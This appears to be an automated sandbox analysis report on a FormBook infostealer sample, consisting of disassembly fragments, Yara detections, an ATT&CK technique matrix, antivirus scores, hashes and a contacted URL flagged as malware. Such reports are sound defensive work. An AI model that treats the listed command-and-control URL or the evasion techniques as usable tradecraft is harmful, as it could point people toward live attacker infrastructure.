          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A137EB mov eax, dword ptr fs:[00000030h]3_2_00A137EB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A137EB mov eax, dword ptr fs:[00000030h]3_2_00A137EB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A137EB mov eax, dword ptr fs:[00000030h]3_2_00A137EB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A137EB mov eax, dword ptr fs:[00000030h]3_2_00A137EB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A137EB mov eax, dword ptr fs:[00000030h]3_2_00A137EB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A137EB mov eax, dword ptr fs:[00000030h]3_2_00A137EB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A237F5 mov eax, dword ptr fs:[00000030h]3_2_00A237F5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AB87CF mov eax, dword ptr fs:[00000030h]3_2_00AB87CF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1D7CA mov eax, dword ptr fs:[00000030h]3_2_00A1D7CA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1D7CA mov eax, dword ptr fs:[00000030h]3_2_00A1D7CA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA17D2 mov eax, dword ptr fs:[00000030h]3_2_00AA17D2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1E730 mov eax, dword ptr fs:[00000030h]3_2_00A1E730
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B73D mov eax, dword ptr fs:[00000030h]3_2_00A0B73D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B73D mov eax, dword ptr fs:[00000030h]3_2_00A0B73D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AB070D mov eax, dword ptr fs:[00000030h]3_2_00AB070D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AB070D mov eax, dword ptr fs:[00000030h]3_2_00AB070D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1C707 mov eax, dword ptr fs:[00000030h]3_2_00A1C707
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1C707 mov ecx, dword ptr fs:[00000030h]3_2_00A1C707
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1C707 mov eax, dword ptr fs:[00000030h]3_2_00A1C707
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E6730 mov eax, dword ptr fs:[00000030h]3_2_009E6730
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E6730 mov eax, dword ptr fs:[00000030h]3_2_009E6730
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E6730 mov eax, dword ptr fs:[00000030h]3_2_009E6730
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1A70E mov eax, dword ptr fs:[00000030h]3_2_00A1A70E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1A70E mov eax, dword ptr fs:[00000030h]3_2_00A1A70E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A14710 mov eax, dword ptr fs:[00000030h]3_2_00A14710
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1D715 mov eax, dword ptr fs:[00000030h]3_2_00A1D715
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1D715 mov eax, dword ptr fs:[00000030h]3_2_00A1D715
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0F716 mov eax, dword ptr fs:[00000030h]3_2_00A0F716
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0E760 mov eax, dword ptr fs:[00000030h]3_2_00A0E760
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0E760 mov eax, dword ptr fs:[00000030h]3_2_00A0E760
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009EA745 mov eax, dword ptr fs:[00000030h]3_2_009EA745
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA1751 mov eax, dword ptr fs:[00000030h]3_2_00AA1751
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E8760 mov eax, dword ptr fs:[00000030h]3_2_009E8760
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E8760 mov eax, dword ptr fs:[00000030h]3_2_009E8760
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E8760 mov eax, dword ptr fs:[00000030h]3_2_009E8760
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E8760 mov ecx, dword ptr fs:[00000030h]3_2_009E8760
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E8760 mov eax, dword ptr fs:[00000030h]3_2_009E8760
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E8760 mov eax, dword ptr fs:[00000030h]3_2_009E8760
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E8760 mov eax, dword ptr fs:[00000030h]3_2_009E8760
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E8760 mov eax, dword ptr fs:[00000030h]3_2_009E8760
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E8760 mov eax, dword ptr fs:[00000030h]3_2_009E8760
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E8760 mov eax, dword ptr fs:[00000030h]3_2_009E8760
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A178A0 mov eax, dword ptr fs:[00000030h]3_2_00A178A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A178A0 mov eax, dword ptr fs:[00000030h]3_2_00A178A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A178A0 mov eax, dword ptr fs:[00000030h]3_2_00A178A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A178A0 mov eax, dword ptr fs:[00000030h]3_2_00A178A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A178A0 mov eax, dword ptr fs:[00000030h]3_2_00A178A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A178A0 mov eax, dword ptr fs:[00000030h]3_2_00A178A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A178A0 mov eax, dword ptr fs:[00000030h]3_2_00A178A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A178A0 mov eax, dword ptr fs:[00000030h]3_2_00A178A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A178A0 mov eax, dword ptr fs:[00000030h]3_2_00A178A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E3880 mov eax, dword ptr fs:[00000030h]3_2_009E3880
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E3880 mov eax, dword ptr fs:[00000030h]3_2_009E3880
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A63884 mov eax, dword ptr fs:[00000030h]3_2_00A63884
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A63884 mov eax, dword ptr fs:[00000030h]3_2_00A63884
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F28AE mov eax, dword ptr fs:[00000030h]3_2_009F28AE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F28AE mov eax, dword ptr fs:[00000030h]3_2_009F28AE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F28AE mov eax, dword ptr fs:[00000030h]3_2_009F28AE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F28AE mov ecx, dword ptr fs:[00000030h]3_2_009F28AE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F28AE mov eax, dword ptr fs:[00000030h]3_2_009F28AE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F28AE mov eax, dword ptr fs:[00000030h]3_2_009F28AE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B8E4 mov eax, dword ptr fs:[00000030h]3_2_00A0B8E4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B8E4 mov eax, dword ptr fs:[00000030h]3_2_00A0B8E4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E78D6 mov eax, dword ptr fs:[00000030h]3_2_009E78D6
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E78D6 mov eax, dword ptr fs:[00000030h]3_2_009E78D6
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E78D6 mov ecx, dword ptr fs:[00000030h]3_2_009E78D6
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AB98FE mov eax, dword ptr fs:[00000030h]3_2_00AB98FE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA18CA mov eax, dword ptr fs:[00000030h]3_2_00AA18CA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F28FD mov eax, dword ptr fs:[00000030h]3_2_009F28FD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F28FD mov eax, dword ptr fs:[00000030h]3_2_009F28FD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F28FD mov eax, dword ptr fs:[00000030h]3_2_009F28FD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E58EC mov eax, dword ptr fs:[00000030h]3_2_009E58EC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A7B8D0 mov eax, dword ptr fs:[00000030h]3_2_00A7B8D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A7B8D0 mov ecx, dword ptr fs:[00000030h]3_2_00A7B8D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A7B8D0 mov eax, dword ptr fs:[00000030h]3_2_00A7B8D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A7B8D0 mov eax, dword ptr fs:[00000030h]3_2_00A7B8D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A7B8D0 mov eax, dword ptr fs:[00000030h]3_2_00A7B8D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A7B8D0 mov eax, dword ptr fs:[00000030h]3_2_00A7B8D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E88E0 mov eax, dword ptr fs:[00000030h]3_2_009E88E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E88E0 mov eax, dword ptr fs:[00000030h]3_2_009E88E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E88E0 mov eax, dword ptr fs:[00000030h]3_2_009E88E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E88E0 mov eax, dword ptr fs:[00000030h]3_2_009E88E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E88E0 mov eax, dword ptr fs:[00000030h]3_2_009E88E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E88E0 mov eax, dword ptr fs:[00000030h]3_2_009E88E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E88E0 mov eax, dword ptr fs:[00000030h]3_2_009E88E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A830 mov eax, dword ptr fs:[00000030h]3_2_00A0A830
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A830 mov eax, dword ptr fs:[00000030h]3_2_00A0A830
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A830 mov eax, dword ptr fs:[00000030h]3_2_00A0A830
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A830 mov eax, dword ptr fs:[00000030h]3_2_00A0A830
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E6800 mov eax, dword ptr fs:[00000030h]3_2_009E6800
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E6800 mov eax, dword ptr fs:[00000030h]3_2_009E6800
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E6800 mov eax, dword ptr fs:[00000030h]3_2_009E6800
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0F86D mov eax, dword ptr fs:[00000030h]3_2_00A0F86D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA1843 mov eax, dword ptr fs:[00000030h]3_2_00AA1843
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A669A6 mov eax, dword ptr fs:[00000030h]3_2_00A669A6
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA49A4 mov eax, dword ptr fs:[00000030h]3_2_00AA49A4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA49A4 mov eax, dword ptr fs:[00000030h]3_2_00AA49A4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA49A4 mov eax, dword ptr fs:[00000030h]3_2_00AA49A4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA49A4 mov eax, dword ptr fs:[00000030h]3_2_00AA49A4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A199BC mov eax, dword ptr fs:[00000030h]3_2_00A199BC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1C9BF mov eax, dword ptr fs:[00000030h]3_2_00A1C9BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1C9BF mov eax, dword ptr fs:[00000030h]3_2_00A1C9BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A099BF mov ecx, dword ptr fs:[00000030h]3_2_00A099BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A099BF mov ecx, dword ptr fs:[00000030h]3_2_00A099BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A099BF mov eax, dword ptr fs:[00000030h]3_2_00A099BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A099BF mov ecx, dword ptr fs:[00000030h]3_2_00A099BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A099BF mov ecx, dword ptr fs:[00000030h]3_2_00A099BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A099BF mov eax, dword ptr fs:[00000030h]3_2_00A099BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A099BF mov ecx, dword ptr fs:[00000030h]3_2_00A099BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A099BF mov ecx, dword ptr fs:[00000030h]3_2_00A099BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A099BF mov eax, dword ptr fs:[00000030h]3_2_00A099BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A099BF mov ecx, dword ptr fs:[00000030h]3_2_00A099BF
          Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeSection loaded: unknown target: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe' Jump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000001.644193470.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.644964411.0000000000600000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000001.644193470.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.644964411.0000000000600000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection111Virtualization/Sandbox Evasion1Input Capture1Security Software Discovery12Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsSoftware Packing11LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothApplication Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection111Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSSystem Information Discovery12Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information3LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SecuriteInfo.com.Variant.Zusy.394472.15672.exe51%VirustotalBrowse
          SecuriteInfo.com.Variant.Zusy.394472.15672.exe23%MetadefenderBrowse
          SecuriteInfo.com.Variant.Zusy.394472.15672.exe61%ReversingLabsWin32.Trojan.VirRansom
          SecuriteInfo.com.Variant.Zusy.394472.15672.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.5c0000.2.unpack100%AviraTR/Patched.Ren.GenDownload File
          3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.1.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          www.yjhlgg.com/grve/9%VirustotalBrowse
          www.yjhlgg.com/grve/100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          No contacted domains info

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          www.yjhlgg.com/grve/true
          • 9%, Virustotal, Browse
          • Avira URL Cloud: malware
          low

          Contacted IPs

          No contacted IP infos

          General Information

          Joe Sandbox Version:33.0.0 White Diamond
          Analysis ID:452434
          Start date:22.07.2021
          Start time:10:48:07
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 4m 4s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:SecuriteInfo.com.Variant.Zusy.394472.15672.20727 (renamed file extension from 20727 to exe)
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed:6
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@3/0@0/0
          EGA Information:Failed
          HDC Information:
          • Successful, ratio: 37.8% (good quality ratio 34.8%)
          • Quality average: 67.9%
          • Quality standard deviation: 32%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 14
          • Number of non-executed functions: 276
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          • Stop behavior analysis, all processes terminated
          Warnings:
          Show All
          • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe

          Simulations

          Behavior and APIs

          No simulations

          Joe Sandbox View / Context

          IPs

          No context

          Domains

          No context

          ASN

          No context

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Created / dropped Files

          No created / dropped files found

          Static File Info

          General

          File type:PE32 executable (GUI) Intel 80386, for MS Windows
          Entropy (8bit):7.972672862174758
          TrID:
          • Win32 Executable (generic) a (10002005/4) 99.96%
          • Generic Win/DOS Executable (2004/3) 0.02%
          • DOS Executable Generic (2002/1) 0.02%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:SecuriteInfo.com.Variant.Zusy.394472.15672.exe
          File size:198124
          MD5:89cfb542cda6a428cc5c02feaf3c55f8
          SHA1:9a0606c633ffe5ae4b6dcb7dcfba57b7e22cb05d
          SHA256:b663fea76aadbf574e5bb9f704ad689ec10f0d720b0b9641e70b27494fe4cc17
          SHA512:22fd691c761ec2ac5be4b3a9b682daf53abb3de05787d07474bc0e41a8c7bf001a10783f3eea6d7d70528dae1da13506e4370b16f3c02b7d92db9e6ffb2ac79b
          SSDEEP:3072:p5y2zSw5QFZ5h8gOgXN15tm4Inoll4wegWYXzb+f3iIvwDrqvHDlkNBKrD9CafOn:Dy2OVbFvLKzTwePi+nQrU8+fLBcMQ
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........WuIl9&Il9&Il9&@..&Bl9&Il8&Ul9&@..&Hl9&@..&Hl9&RichIl9&........PE..L......`.....................................0....@........

          File Icon

          Icon Hash:00828e8e8686b000

          Static PE Info

          General

          Entrypoint:0x401000
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE
          Time Stamp:0x60F8A6D1 [Wed Jul 21 22:59:29 2021 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:5
          OS Version Minor:0
